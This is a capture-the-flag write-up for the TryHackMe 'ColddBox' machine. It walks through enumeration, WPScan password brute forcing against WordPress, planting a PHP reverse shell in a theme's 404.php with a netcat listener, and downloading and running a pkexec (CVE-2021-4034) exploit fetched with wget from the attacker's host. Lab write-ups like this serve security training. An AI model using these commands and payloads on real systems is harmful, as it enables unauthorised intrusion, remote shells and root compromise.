ColddBox - TryHackMe Write-Up
Elizeu Das Dores
Red Team Operator | Pentester | Offensive Security | Ethical Hacker | Adversary Emulation | Cybersecurity Speaker | OSCP+| CEH | CRTP | eWPTX | CAPenX | OSWP | CRTA | eCPPT | MCRTA | 3x CVEs
Description: An easy level machine with multiple ways to escalate privileges. By Hixec. This TryHackMe machine focuses on Linux privilege escalation and CMS (Content Management System) exploitation, including WordPress vulnerabilities, making it ideal for ethical hacking and penetration testing practice.
STEP 1: Enumeration
To begin the assessment, we start by executing a nmap scan to identify open ports on the target system.
nmap -v -sSV -Pn -p- 10.10.147.34 -T 5 --open
Below is the result of the Nmap scan.
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We accessed the website running on port 80.
We immediately started a directory brute-force scan using the Gobuster tool.
gobuster dir -u http://10.10.215.37/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
Reference: gobuster | Kali Linux Tools
Where we discovered a "/hidden" directory containing the following message:
"C0ldd, you changed Hugo’s passwords, when you can, send it to him so he can continue uploading his articles. Phillp."
This gave us valuable information suggesting that Hugo’s credentials were recently changed and are likely stored somewhere accessible, which may be useful for gaining further access.
With this, we were able to enumerate three valid users.
C0lld
Hugo
Phillip
Additionally, the directory brute force attack uncovered the "/wp-admin" endpoint, indicating that the application is running a WordPress CMS.
With the confirmation that the application is running WordPress, we proceeded to use the WPScan tool to enumerate potential vulnerabilities.
wpscan --url http://10.10.147.34 --api-token <YOUR_API_TOKEN_WPSCAN>
Reference: wpscan | Kali Linux Tools
However, it did not identify any vulnerable plugins.
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.147.34/ [10.10.147.34]
[+] Started: Wed Nov 22 18:55:14 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.147.34/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.147.34/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.147.34/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.147.34/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://10.10.147.34/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
STEP 2: Exploitation
Since we had already enumerated three valid users in the application, we could use them for a brute-force attack to check if any of them had weak passwords.
Names:
C0lld
Hugo
Phillip
WPScan command:
wpscan --url http://10.10.147.34 -P rockyou.txt -U names.txt
Reference: 100SECURITY
With this, we were able to confirm that the user "C0lld" has a weak password.
[!] Valid Combinations Found:
Username: C0ldd, Password: 9876543210
We successfully logged into the user's account.
STEP 3: Remote Code Execution
The next objective was to gain remote access to the server. The simplest method involved creating a PHP page containing the reverse shell script from Pentest Monkey and triggering it via the browser.
I replaced the site's 404.php page with this reverse shell script, so when the 404 error page is accessed, it initiates a reverse shell connection through the Twenty Fifteen theme.
Note: In the Pentest Monkey PHP reverse shell script, make sure to update the following variables with your actual listener information before deployment:
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
Pentest Monkey Reverse Shell: GitHub - pentestmonkey/php-reverse-shell
After saving the changes, start netcat (nc) listening on the configured port, then open the 404.php page in the browser to gain remote access to the server.
# Your machine
nc -lnvp <YOUR_LISTING_PORT>
# In the Browser
http://10.10.215.37/wp-content/themes/twentyfifteen/404.php
This approach allowed us to gain initial access to the server using a non-privileged user account, www-data, which is typically the default user for web server processes. To improve the usability and interactivity of the shell, we upgraded it by spawning a fully interactive TTY shell with the command:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Reference: Upgrade no shell reverso - Hacking na Web
This upgrade provides better terminal features such as job control, command history, and proper signal handling, making further post-exploitation activities easier and more stable.
STEP 4: Vertical Privilege Escalation
To escalate privileges, I searched for executables with the SUID permission set. These binaries, when executed, run with the privileges of the root, instead of the current user.
I used the following command to identify such files across the system:
find / -perm -u=s s -type f 2>/dev/null
Reference: SUID/SGID Shared Object Injection | Linux Privilege Escalation | by Aman Chauhan | Medium
Using this method, I discovered the presence of the pkexec binary, which is vulnerable to a known local privilege escalation flaw in Polkit, identified as CVE-2021-4034 (also known as PwnKit).
This vulnerability allows an unprivileged user to gain root access by exploiting the way pkexec handles environment variables. It affects a wide range of Linux distributions and is particularly dangerous due to its reliability and ease of exploitation.
To exploit the pkexec vulnerability (CVE-2021-4034), I cloned a public PoC from GitHub to my local machine and hosted it using a simple Python HTTP server. On the compromised host, I downloaded the exploit script to the /tmp directory using wget, set the appropriate execution permissions, and executed it—successfully achieving root access.
Pkexec Exploit: GitHub - NxPnch/pkexec-exploit
# On my local machine
git clone https://github.com/NxPnch/pkexec-exploit.git
cd pkexec-exploit
mv CVE-2021-4034.py pkexec.py
python -m http.server 80
# On the remote machine
cd /tmp
wget http://<YOUR_IP>/pkexec.py
chmod +x pkexec.py
./pkexec.py
After successfully gaining root access, we were able to read both the user and root flags, completing the objective.
cat /home/c0ldd/user.txt
cat /root/root.txt